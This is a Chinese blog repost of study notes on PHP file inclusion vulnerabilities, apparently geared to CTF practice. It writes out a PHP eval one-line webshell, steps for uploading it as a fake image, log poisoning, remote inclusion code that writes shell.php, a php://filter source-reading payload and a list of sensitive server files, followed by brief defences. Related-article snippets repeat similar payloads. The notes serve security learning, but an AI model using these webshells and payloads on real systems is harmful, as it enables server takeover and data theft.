文件包含漏洞

最新推荐文章于 2024-06-20 23:57:10 发布
最新推荐文章于 2024-06-20 23:57:10 发布
阅读量101 收藏 1
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/Abelte/p/8933088.html
版权

讲一句话木马的文件 嵌入到另一个文件中,这个文件可以是图片,可以是文本

文件包含函数(php)

include

require

include_once

require_once

漏洞整体的分类 

  本地文件包含

  远程文件包含漏洞

 

常见敏感文件

unix/linux 

  /etc/passwd 

      /usr/local/app/apache2/conf/httpd.conf   apache2默认配置文件

  /usr/local/app/apache2/conf/extra/httpd-vhosts.conf  虚拟网站设置

  /etc/my.cnf mysql的配置文件 

凯撒加密

 

文件包含与文件上传合集

      

已知:此处是一个文件包含漏洞,

              

 

  此处有一个文件上传漏洞

  1. 先从此处上传一个后缀名为图片格式的文件,此文件是php一句话木马修改后缀名得到的 
  2. 上传成功后会得到一个文件路径 :uploads/alert.png 意思是位于此文件夹下的uploads文件夹里
  3. 返回文件包含漏洞的链接,将后面的flag替换为上面的 uploads/alert.png 转到没有报错 
  4. 将此链接复制到菜刀里 ,连接成功!

            

 

http://xxxxxxx/?id=1   没有显示在哪个页面 一般可以还原为 http://xxxxxxxx/index.php?id=1 或者http://xxxxxxxxxxx/index.html?id=1

利用错误日志进行测试

首先构造一句话木马

http://xxxxx/<?php eval($_POST[value])?> 

由于浏览器解析的时候 会将特殊字符转义为URL编码 

GET 头部 修改为 <?php eval($_POST[value])?>,然后放包

发现页面报错,由此可判断 错误日志中已经有了这个木马,

找到日志的路径(路径先测试默认的 默认的不行就猜,或者利用phpinfo();查看各种配置信息)

远程文件包含 getshell

  条件 : allow_url_include = on 

  <?php eval($_POST[value])?>

远程文件包含自己写shell

fputs(x,y),fopen(x,y)

<?php

fputs(fopen("shell.php",w),"<?php eval($_POST[value])?>")  //这句话的意思是 在当前目录下 将<?php eval($_POST[value])?>这段代码 写入到shell.php这个文件中,若没有这个文件就先新建。

?>

将上面的一段代码复制到一个php文件中,放在自己的服务器上,利用目标服务器存在的远程文件包含漏洞,将此文件包含进去,目标服务器就会执行里面的代码,新建一个一句话木马文件,然后到shell这个文件的路径下 执行这个文件。

http://127.0.0.1:98/cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php 

将main.php的源码利用base64编码方式显现出来,获得一串字符串 将字符串选中 在hackbar中 找到 Encoding => Base64 Decode 点击 即可得到源码,main.php可以是任意php文件

 

system()里面的参数是系统命令

 

当然也可以这样做 页面会提示错误,但是查找目录会找到对应的文件。

 

如何防御呢?

1.allow_url_include=off

2.严格判断包含的参数是否外部可控

3.路径限制,限制被包含的文件只能在一个文件夹中,

....

附带一个练习题目的链接:http://ctf.bugku.com/challenges

转载于:https://www.cnblogs.com/Abelte/p/8933088.html

ahu0076
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
【威胁分析】<?php eval($_POST[‘a‘]);?>
sinat_35058227的博客
08-29 5108
请求体解码为: <?php eval($_POST['a']);?> 一句话木马。 eval():将括号内的字符串解析为php代码。 $_POST[‘a’]:a=XXX,向后台传输的参数 所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行。 利用示例: URL: XXX.php?a=XXX 威胁分析: 1、判断是否利用该方式攻击:
BUUCTF web部分题(二)
yqdid的博客
04-01 1723
[极客大挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
五、文件包含漏洞
weixin_33717117的博客
04-23 218
定义: 程序员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 1.本地文件包含(LFI) 1.读取敏感信息 查看boot文件信息:=../../boot.ini 查看其他敏感信息:敏感信息.jpg 2.日志获取webshell Apache日志:访问日志access.log,错误日志:error.log 确认有本地包含漏洞...
6-5CTF夺旗入门教程--路径遍历(www-data权限)
高冷的宅先生
04-11 725
1.目录遍历漏洞介绍 路径遍历攻击(目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的事,系统操作访问控制(如在Windows操作系统上锁定或使用文件)限制了对文件的访问权限 这种攻击也称为“点-点斜线”、“目录遍历...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1273
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4033
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 2957
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
限制php本地文件只能在指定目录打开的open_basedir配置
tenfyguo的技术专栏
06-09 3690
php的include(), include_once(), require(),require_once(),等等打开文件的函数,如果打开的文件路径或者文件名由
深入解析PHP函数
NatLindsay的博客
06-17 436
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 315
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
[极客大挑战 2020]Roamphp4-Rceme
最新发布
不会编程的崽的博客
06-20 211
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
文件包含漏洞黑盒测试
06-04
文件包含漏洞是指攻击者通过在应用程序中找到可以包含外部文件的函数或者代码,然后将恶意代码或者文件包含进来,从而实现攻击的一种方式。黑盒测试是指在不了解应用程序内部代码的情况下,通过对应用程序的输入和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值